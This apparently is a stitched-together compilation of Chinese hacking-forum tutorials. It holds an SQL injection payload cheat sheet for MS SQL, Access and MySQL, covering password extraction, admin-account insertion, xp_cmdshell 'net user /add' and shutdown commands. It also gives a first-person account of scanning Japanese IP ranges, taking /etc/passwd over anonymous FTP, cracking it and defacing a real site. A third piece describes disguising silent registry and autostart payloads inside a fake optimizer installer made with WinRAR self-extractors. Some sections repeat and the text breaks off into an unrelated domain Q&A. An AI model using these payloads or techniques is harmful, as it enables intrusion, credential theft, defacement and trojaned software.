http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 password FROM admin_login where

u_name=tony--
我们很可能发现，该页无法显示的错误。这结果表示，密码"19840217"被修改到一个数了。在整
合一个整型(10 也是)，因为这是一个有效的整合。所以SQL服务就不会给出错误的提示了。
我们就得不到数字的登陆了。
要解决这个问题，我们能附加一些字母来测试转换失败。我们用以下的测试来代替：
http://xxx.xxx.com/job/grxx.asp?id=23 ;UNION SELECT TOP 1 convert(int,

password%2b%20lambgirl) FROM admin_login where u_name=tony--

我们简单地利用加号+设置密码数据文件的搜索路径。随便加一些。ASSCII码+ = 0x2b
我们将添加空格在密码里。所以，如果把我们的密码是19840217。他将变成19840217 lambgirl.
调出了转换了的函数。试着将19840217 lambgirl转变成整型。SQL服务将出现ODBC错误：
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value

19840217 lambgirl to a column of data type int.
/index.asp, line 5
现在，你就能用tony和密码：19840217 lambgirl了。


如何在数据库修改，插入数据？
当我们成功地获得了表名，字段。就很容易在数据库里修改甚至插入新的数据。如更改"adminroot"
的密码，我们

http://xxx.xxx.com/job/grxx.asp?id=23 ;UPDATE admin_login SET password = newpas5 WHERE

u_name=adminroot--

要在数据表里插入新记录，

http://xxx.xxx.com/job/grxx.asp?id=23 ;INSERT INTO admin_login (u_id, u_name,

password, contents) VALUES (123,xiaolin,pas,lambgirl)--
现在，我们就能用xiaolin pas 来登陆了。


如何远程执行SQL漏洞？

能进行SQL注入命令表明，我们能查任何我们想要查的。默认安装的的MS SQL服务
在系统中权限等于管理员。我们能利用执行存储过程像xp_cmdshell 来执行远程破坏：
; exec master..xp_cmdshell ping 192.168.0.2--

(如果单引号不能用，就换成双引号)

分号表示结束前面的SQL查询，从而允许你开始另一个新的SQL命令。
为了检验命令成功执行，你可以监听从192.168.0.2发出的的ICMP包。查看是否发出包。

#tcpdump icmp
如果你没有接到PING主机的回应，得到一个错误的提示，权限错误，那么，很可能管理员
限制了WEB用户对xp_cmdshell 等的权限。

如何找出MYSQL查询结果？
这很容易用sp_makewebtask来把你查询的结果放到一个HTML里：
; EXEC master..sp_makewebtask "192.168.0.2sharegirlxiaolin.html", "SELECT * FROM

INFORMATION_SCHEMA.TABLES"
但是目标IP必须共享文件夹。


http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net user name
password /add”--

xp_cmdshell 用于调用系统命令，于是，用net命令新建了用户名为name、密码为password
的windows的帐号，接着：
http://xxx.xxx.com/job/grxx.asp?id=23 ;;exec master..xp_cmdshell “net localgroup name

administrators /add”--
将新建的帐号name加入管理员组，不过这种方法只于用sa连接数据库的情况，否则，没有权限调用

xp_cmdshell。

其他方面，如利用SQL的命令填写：
将使SQL服务快速关闭
用户名: ; shutdown with nowait; --
密码: 不填

导致严重问题，网络故障。
用户名: ; exec master..xp_cmdshell iisreset; --
密码：不填

关于ACCESS部分，

和ASSQL差不了多少，也是先在http://xxx.xxx.com/index.asp?id=10

出错的话，继续提交：
先测试是否有ADMIN表，
http://xxx.xxx.com/index.asp?id=10 and 0<>(select count(*) from admin)

http://xxx.xxx.com/index.asp?id=10 and 1=(select count(*) from admin)
没有的话，就换一个名字，如user啊，什么的。再猜里面是否有username这个字段.

and 1=(select count(*) from admin where len(username)>0)
如果出错，同理，我们也可以给它换一个名字。
接下来我们猜用户的具体名字。
and 1=(select count(*) from admin where left(username,1)=l)
这时我们可以一个一个地来猜。
and 1=(select count(*) from admin where left(username,2)=la)
接下来猜密码，猜密码的道理同猜用户名一样。
and 1=(select count(*) from admin where left(password,1)=l)

' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
' and LENGTH(password)='6（探测密码长度）

' or 1=1
' or '1=1
'/*
'%23
' and password='mypass
id=-1 union select 1,1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1,1 from members
id=1 union select 1,1,1 from admin
id=1 union select 1,1,1 from user
userid=1 and password=mypass
userid=1 and mid(password,3,1)=char(112)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）
' and LENGTH(password)='6（探测密码长度）
' and LEFT(password,1)='m
' and LEFT(password,2)='my
…………………………依次类推
' union select 1,username,password from user/*
' union select 1,username,password from user/*
=' union select 1,username,password from user/* （可以是1或者=后直接跟）
99999' union select 1,username,password from user/*
' into outfile 'c:/file.txt （导出文件）
=' or 1=1 into outfile 'c:/file.txt
1' union select 1,username,password from user into outfile 'c:/user.txt
SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile
id=-1 union select 1,database(),version() （灵活应用查询）
常用查询测试语句，
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1
SELECT * FROM table WHERE ISNULL(NULL)
SELECT * FROM table WHERE ISNULL(COT(0))
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END

例如：夜猫下载系统1.0版本
id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 （替换，寻找密码）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 （验证第一位密码）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 （第二位）
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
…………………………………………………………

例如2：灰色轨迹 变换id进行测试（meteor）
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
构造语句：
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1)
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1)
UNION%20(SELECT%201,0,2,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate （查沙子的id）



（SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……（字段和数据库相同情况下，可直接提交）
SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……（不同的情况下）

特殊技巧：在表单，搜索引擎等地方写：
“___”
“.__ ”
“%
%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#

$command = "dir c:";system($command);
SELECT * FROM article WHERE articleid='$id'
SELECT * FROM article WHERE articleid=$id
1' and 1=2 union select * from user where userid=1/* 句中变为
(SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*')
1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：
CREATE DATABASE `injection`
CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) ;
INSERT INTO `user` VALUES (1, 'swap', 'mypass');


插如一个注册用户：
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
“INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";
INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')
"INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";
INSERT INTO membres SET login='',password='',nom='',userlevel='3',email=''
"INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";

UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
"UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'";
UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]'
"UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'";

长用函数：
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
比如：
UPDATE article SET title=$title WHERE articleid=1 对应函数
UPDATE article SET title=DATABASE() WHERE id=1
#把当前数据库名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把当前 MySQL 用户名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name";
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name
SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' （经典）
SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password=''
SELECT * FROM table WHERE msg LIKE '%hop'
SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password=''
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name

信息来源：黑色海岸线

今天我们来看看允许匿名登陆的主机的简单入侵方法。

所需工具： FTP scanner v2.1.48
下载地址: http://202.103.69.85/city/ftpscaner.zip　1.99M.

我们这里说的允许匿名登陆的主机是说的匿名FTP登陆.

呵呵

大家也有可能连FTP是什么也不知道． ：）

我们先来看看有关它们的名词解释：

FTP　(File Transfer Protocol) 文件传送协议

FTP是在Internet网络上最早用于传输文件的一种通信协议,它是将本地计算机通过登录注册成为远程主机的客户端，通常我们将采用该协议传输文件的程序称为FTP软件。

使用FTP可以从Internet网络上获取远程主机的各类文件信息,包括公用程序、各类应用程序、情报信息等等。FTP支持ASCII与Binary两种传输模式，并且可以在两种模式之间切换。

信息来源：黑色海岸线

今天我们来看看允许匿名登陆的主机的简单入侵方法。

所需工具： FTP scanner v2.1.48
下载地址: http://202.103.69.85/city/ftpscaner.zip　1.99M.

我们这里说的允许匿名登陆的主机是说的匿名FTP登陆.

呵呵

大家也有可能连FTP是什么也不知道． ：）

我们先来看看有关它们的名词解释：

FTP　(File Transfer Protocol) 文件传送协议

FTP是在Internet网络上最早用于传输文件的一种通信协议,它是将本地计算机通过登录注册成为远程主机的客户端，通常我们将采用该协议传输文件的程序称为FTP软件。

使用FTP可以从Internet网络上获取远程主机的各类文件信息,包括公用程序、各类应用程序、情报信息等等。FTP支持ASCII与Binary两种传输模式，并且可以在两种模式之间切换。


FTP在实际文件传输中不需要对文件的内容进行修改或解释，也就是说进行的是明码的传输，这样就注定了其安全性的不可靠性。FTP运行在OSI模型的应用层，并利用传输控制协议TCP在不同的主机之间提供可靠的数据传输。FTP在文件传输中支持断点再续，这样大幅度的减少了CPU和网络带宽的开销。利用FTP做攻击也是网络攻击中最为普通的形式．

我们来看看他的相关命令．你也可以在Ms-dos下输入 ftp -help 得到

******************************************

FTP的命令行格式为： ftp -v -d -i -n -g [主机名] ，

其中 -v 显示远程服务器的所有响应信息； -n 限制ftp的自动登录，即不使用；.n etrc文件； -d 使用调试方式； -g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):

1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip

2.$ macro-ame[args]： 执行宏定义macro-name。

3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。

4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。

5.ascii：使用ascii类型传输方式。

6.bell：每个命令执行完毕后计算机响铃一次。

7.bin：使用二进制文件传输方式。

8.bye：退出ftp会话过程。

9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。

10.cd remote-dir：进入远程主机目录。

11.cdup：进入远程主机目录的父目录。

12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。

13.close：中断与远程服务器的ftp会话(与open对应)。

14.cr：使用asscii方式传输文件时，将回车换行转换为回行。

15.delete remote-file：删除远程主机文件。

16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。

17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件

18.disconnection：同close。

19.form format：将文件传输方式设置为format，缺省为file方式。

20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。

21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。

22.hash：每传输1024字节，显示一个hash符号(#)。

23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。

24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。

25.image：设置二进制传输方式(同binary)。

26.lcd[dir]：将本地工作目录切换至dir。

27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。

28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。

29.mdelete[remote-file]：删除远程主机文件。

30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。

31.mget remote-files：传输多个远程文件。

32.mkdir dir-name：在远程主机中建一目录。

33.mls remote-file local-file：同nlist，但可指定多个文件名。

34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。

35.modtime file-name：显示远程主机文件的最后修改时间。

36.mput local-file：将多个文件传输至远程主机。

37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。

38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。

39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap ..[，].[，]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。

40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。

41.open host[port]：建立指定ftp服务器连接，可指定连接端口。

42.passive：进入被动传输方式。

43.prompt：设置多个文件传输时的交互提示。

44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。

45.put local-file[remote-file]：将本地文件local-file传送至远程主机。

46.pwd：显示远程主机的当前工作目录。

47.quit：同bye，退出ftp会话。

48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.

49.recv remote-file[local-file]：同get。

50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。

51.rhelp[cmd-name]：请求获得远程主机的帮助。

52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。

53.rename[from][to]：更改远程主机文件名。

54.reset：清除回答队列。

55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。

56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。

58.send local-file[remote-file]：同put。

59.sendport：设置PORT命令的使用。

60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name：显示远程主机文件大小，如：site idle 7200。

62.status：显示当前ftp状态。

63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。

64.sunique：将远程主机文件名存储设置为只一(与runique对应)。

65.system：显示远程主机的操作系统类型。

66.tenex：将文件传输类型设置为TENEX机的所需的类型。

67.tick：设置传输时的字节计数器。

68.trace：设置包跟踪。

69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。

70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。

72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

73.?[cmd]：同help.

FTPD FTP服务器监视程序、FTP守护进程

FTPD是标准的FTP服务器监视程序（Daemon）。它用来应答由inetd接受的连接请求并把这些请求通知文件传输器。Unix系统上FTPD是个标准的组成部分．

FTP server FTP服务器

FTP服务器是Internet上的重要组成部分，它可以使用户通过FTP协议来做用户自己喜欢做的事情。FTP服务器目前有很多的版本和型号以及品牌。但这些版本的安全也是相当受到重视的。他们都因某种错误配置或缺陷而存在有安全漏洞，最为严重的就算是wu-ftpd93年4月以前的那个版。

Anonymous FTP 匿名FTP

在网络中最常用的文件传输协议。允许用户使用Anonymous或FTP作为用户名以用户信箱做为口令（确切的说是任何带@的口令）登陆到系统。虽说匿名FTP本身 并不是个漏洞，因为匿名区域里放置有/etc/passwd和/etc/group文件，往往可能因为管理员配置上的大意造成潜在的安全隐患。

使用匿名的FTP，用户可以匿名登陆FTP服务器。登陆时需要用户提供完整的E-mail地址做为passwd，其实在很多站点上这个要求形同虚设，你只要在其中包含有@字节看起来像个E-mail地址就行了，主机不会对口令做任何效验的。

远程所提供FTP服务的主机在处理匿名用户的命令时，一般都会执行一个chroot命令让匿名者进入主机所允许的匿名FTP区域。然而为了支持匿名FTP和用户FTP，FTP服务器要访问所有文件，也就证明了FTP服务器不是总在chroot环境中运行的。这个环节会让一些愚蠢的管理员不知所为而未曾理会，很容易被有心者所利用而得到一个匿名FTP用户所不能得到的权限。

一般解决这个问题可以通过修改inetd的配置来替代直接启动FTP服务器，它执行chroot（就类似于chrootuid的程序），然后再启动服务器就可以了。

一般情况下，FTP只限于在匿名用户下访问，匿名用户有其正常的权限，在启动服务器前执行chroot就意味着匿名用户将受到限制。（注意：很多FTP服务器在其建立匿名FTP系统中只单纯的依赖自己购买FTP服务器的销售说明书中所讲述的来做，而往往这些销售说明中一般都不会谈到漏洞和堵塞漏洞的方法，这个大意是绝对致命的）。

如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件，那么就说明了可能有内部客户将这个文件放置在匿名的FTP区域了。

在很多网络攻击事例中用匿名用户可以阅读到/etc/passwd文件这就是管理员很大错误表现。还有隐患是telnet到ftp21如果允许执行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户，那么随便就可把权限设置成777或者更多的进行修改等等。

先下载FTP scanner 这个软件，我们需要用到它。

杀毒，安装好后，我们从开始菜单中的程序中找到FTP Scanner并运行它。

我们熟悉一下我们要使用的软件的界面。

打开软件我们可以看到

Host 主机

Beginning 开始IP

下面有几个文本框

我们在这里填入我们要开始扫描的IP.

Ending 结束IP

下面有几个文本框

我们在这里填入我们结束扫描的IP.

在下面有一个

Threads 线程

我们可以根据网速来选择这里的线程数.

通常Moden上网选为50--70左右.

更快的话选到100个线程.

然后我们选择菜单Session 里的Begin FTP scan

就可以开始了扫描了．.

======================================

应用技巧：

我们可以在View 里的options选项里选择我们的扫描参数．

在Login config里

里的UserName 和 Password我们通常不用更改．

但你也可以改动他．

比如你想扫描特定的帐号．比如扫描用户 Oracle密码也是Oracle的话

就改动这里的 UserName 和 Password

在IP Logging里

我们可以更改扫描结果存放的位置．

随便选择一个位置和文件名就可以了．

默认是存放在安装目录下面的iplog.txt文件．

台湾的机器我们干掉的太多了，伤及了很多平民网站,在这里我对我以前的行为作出检讨． 这次，我们来日本看看。相信大家不会不恨小日本吧．

去搜狐网站敲了一个“日本”，搜索一下，找到1000多个相关网站。

然后，随便挑了一个： www.jcbus.co.jp ping www.jcbus.co.jp

得到它的IP。

210.143.99.80

我们来扫描

210.143.99.1-------210.143.99.254

因为我们不是对特定的主机来攻击．现在我们做的只是在一堆机器里面找．呵呵：）

过了几分钟

结果出来了，找到了10台．

我们来到安装这个扫描器的目录下查看iplog.txt

可以看到．

210.143.99.21

210.143.99.68

210.143.99.80==*

210.143.99.94

210.143.99.121

210.143.99.130

210.143.99.189

210.143.99.175

210.143.99.200

210.143.99.249

运气不错,看到了吗？

www.jcbus.co.jp是可以匿名进去的．

我们就进这个看看吧．：）

C:>ftp 210.143.99.80

Connected to ns.jcbus.co.jp. 220 ns.jcbus.co.jp FTP server (Version wu-2.4.2-academ[BETA-15](1) Tue Jan 19 00 :22:43 GMT 1999) ready.

User (ns.jcbus.co.jp:(none)):


呵呵 Wu-ftp 2.4.2？

好象有很大的漏洞哦．：）

不过不在我们今天的教程介绍范围．

我们用FTP进去看看．

User (210.143.99.200:(none)): ftp

331 Guest login ok, send your complete e-mail address as password.

Password: ftp@　　　----（可以随便输入）

230-The response 'ftp' is not valid 230-Next time please use your e-mail address as your password

230- for example: joe@202.104.49.193

230Guest login ok, access restrictions apply.

ftp>

呵呵

先看看能不能去根目录．

ftp> cd /

250 CWD command successful.

ftp> ls

200 PORT command successful.

150 ASCII data connection for /bin/ls (202.104.49.193,2643) (0 bytes).

bin

cdrom

dev

devices

etc

....

....

....


ASCII Transfer complete.

ftp: 161 bytes received in 0.81Seconds 0.20Kbytes/sec. ftp>

呵呵

执行成功：）

但在它的网页的目录里我没有写权限．：（

只好先把密码档先当下来．

ftp> get /etc/passwd

把密码档搞下来．

然后用小榕的流光提取用户．

26个用户．

挂上一个小字典跑．

几分钟过去后，

终于找到一个可以利用的shell了．

user: webmaster

passwd: web

呵呵

上载了一个脚本，后果嘛，就不用我多说了,放上一段国歌，插上国旗，找了两个网友欣赏了一下．

1个小时后，网页恢复了．

我回去看了看ftp和webmaster都不能登陆了． 倒

早知道给他留几个后门．：（

这是一次关于允许匿名登陆的主机的简单入侵

是Redhat 4.2

其实我们可以发现,NT系统的允许匿名登陆的主机更多,很多主机更离谱的是．anonymous竟然有到根目录和写的权限,能够找到的更多,不知道他们是怎么搞的,通常可以找到的是Web是IIS4.0 IIS3.0的NT．国内的这样的机器真的不少,不过我发现日本的redhat倒真的不少．有几个网段我扫描过的竟然清一色全部是redhat．

信息来源：第八军团

与Winzip相比，Winrar3.0的自解压程序要多出功能。其中一项最为突出的功能，也是潜在着最大危险的是：它可以在解压前或解压后，无声无息地自动运行程序。

　　如果你不以为然，先看完以下事例：

　　几天前，一位朋友要我copy一份我从网上下载的‘Windows 优化大师’给他，我灵机一动，想起这几天研究Winrar3.0的心得，便满口答应。到了晚上，我花了几小时的时间为他特制了一份‘Windows 优化大师’，制作流程如下：建立一个注册表脚本文件，我取的文件名为regeditt.reg在里面写入：

信息来源：第八军团

与Winzip相比，Winrar3.0的自解压程序要多出功能。其中一项最为突出的功能，也是潜在着最大危险的是：它可以在解压前或解压后，无声无息地自动运行程序。

　　如果你不以为然，先看完以下事例：

　　几天前，一位朋友要我copy一份我从网上下载的‘Windows 优化大师’给他，我灵机一动，想起这几天研究Winrar3.0的心得，便满口答应。到了晚上，我花了几小时的时间为他特制了一份‘Windows 优化大师’，制作流程如下：建立一个注册表脚本文件，我取的文件名为regeditt.reg在里面写入：

REGEDIT4

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion]
"Registered Owner"="××"
[HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E}]
@="××""InfoTip"="包含可以恢复或永久删除的已删除项目。"
[HKEY_USERS.DEFAULTSoftwareClassesCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}]
@="××的电脑"
[HKEY_CURRENT_USERControl PanelInternational]
"StimeFormat"="×× HH:mm"
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
"TaskMonitoy"="regedit /s c:Windowssysbckup
regeditt.reg"

注：以上××均是不健康的调侃他人的词汇，编辑对它们做了净化。

　　上面第一项是更改计算机注册名称，第二项是更改‘回收站’名称，第三项是更改‘我的电脑’名称。第四项是在任务栏时间前加上文字,第五项是每次开机后自动运行c:Windowssysbckup egeditt.reg。

　　建立完成后就是用Winrar打包了，选中regeditt.reg后击右键，在菜单中选‘添加到档案文件’，在弹出对话框中，把档案名称写为a1.exe，在下面存档选项中选中‘创建自释放格式’。然后在高级-自释放选项中写入释放路径，我写的是c:WindowsSysbckup，接下来就是在‘释放后运行’中写入regeditt.reg，然后在模式中选中‘全部隐藏’和‘覆盖所有文件’，完成这些后按确定，再选择注释我们会看到以下内容：

Path=c:WindowsSysbckupSetup=regeditt.regSilent=1Overwrite=1

我们发现释放后运行的格式是Setup=*.*,这里是=regeditt.reg，但这样运行后系统会提示你是否确认导入注册表，所以应作如下修改：

Path=c:WindowsSysbckupSetup=regedit /s regeditt.regSilent=1Overwrite=1

完成后按确定按扭，就会建立出一个名为a1.exe的Winrar自解压程序,如果双击运行它，屏幕上将没有任何显示，但它已无声无息地把regeditt.reg拷贝到c:WindowsSysbckup，并把其中的内容写入到注册表中了。

　　现在的问题是如何让我的朋友运行A1.exe呢？对了，用‘Windows 优化大师’。把A1.exe与‘Windows 优化大师’的安装文件(解压后的)放在一起打包，建立 Windows 优化大师.exe，全选后击右键，选‘添加到档案文件’……操作大致同A1.exe。只不过名称改为 Windows 优化大师.exe，解压路径改成：c:Windows emp,而且解压后要运行A1.exe和setup.exe两个文件，其注释内容应为：

Path=c:Windows empSetup=a1.exeSetup=setup.exeSilent=1Overwrite=1

按确认后，我们已初步完成了一份特制的‘Windows 优化大师’了，为什么说‘初步’完成呢？因为现在修改注册表和启动项早已不是什么秘密了，所以A1.exe只不过是附料，还需要加入一味主料：A2.exe.把regeditt.reg更名另存为system.reg,去掉其中的

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
"TaskMonitoy"="regedit /s c:Windowssysbckupregeditt.reg"

然后用计事本建立Winstart.bat,其中内容要写成：@echo off regedit c:Windowssystem.reg>nul这样写屏幕上将没有显示，完成后把这两个文件用Winrar作成自解压程序A2.exe,操作同A1.exe,但解压路径要改成 c:WinDOWS,解压后也不需运行.其注释内容应为：

Path=c:WindowsSilent=1Overwrite=1

完成后把a2.exe加入做好的 Windows 优化大师.exe，加入方法是：右击 Windows 优化大师.exe选择‘用Winrar打开’，把a2.exe拖入，按确定，然后点击工具栏中的注释，修改其中内容为：

Path=c:Windows empSetup=a1.exeSetup=a2.exeSetup=setup.exeSilent=1Overwrite=1

然后确定-退出。到此为止，特制的‘Windows 优化大师.exe’已全部完成。因为Winstart.bat是在进入Windows图形界面之前运行的一个程序，所以加入A2.exe后,就算我的朋友能恢复注册表，甚至删除regeditt.reg，但只要c:Windows下的system.reg和Winstart.bat不被发现，重启动后他的电脑将‘××’依旧。

　　在Windows98中启动程序的方法很多，如通过AUTOEXEC.BAT、Winstart.bat、开始菜单中的启动、注册表中的启动项、Win.ini、system.ini、Wininit.ini和修改文件关联等都可达到启动程序的目的。如：用Winrar自解压程序在注册表中导入

REGEDIT4
[HKEY_CLASSES_ROOT xtfileshellopencommand]
@="regedit /s c:Windowssystem.reg"

那么在双击txt类型文件时将不会以计事本打开，而是没有任何反应。但c:Windowssystem.reg中的内容也会悄无声息的被导入注册表。但我没有这样做，因为现在的这些已经够的的朋友折腾了。

　　第二天，我把这份‘精装’的 Windows 优化大师 交给了朋友，其后果可想而知。足足三天他在对着屏幕上的‘××’发愣。

　　以上的这些只是我用了Winrar强大的自解压功能，和朋友开了一个小玩笑，但从上面事例不难看出，WinrarR的这些功能使不会编程的人也能制作出一些恶意的程序，如果有人给这些程序起上一些漂亮的名字（如Windows 优化大师 2002 等）在网上发布，用它来format你的硬盘、deltree你的文件等等，也不是没有可能的。最最可怕的是，如果运行的是一个木马程序的客户端，那后果更加的不勘设想。

　　提示：不要直接运行自解压程序。，而是选择右键菜单中的“用Winrar打开”。

信息来源：RingZ BBS

1、请问能否将域本地组加入其它域的全局组中？
答：可以加入全局组的有通用组,全局组和域本地组.
2、administrators成员能不能用同一个帐号创建share folder和Dfs root?
答：ADMINISTRATOR的权利在W2K中是最大的。除非通过GP进行限制。

3、POWER USER组能创建打印机吗？
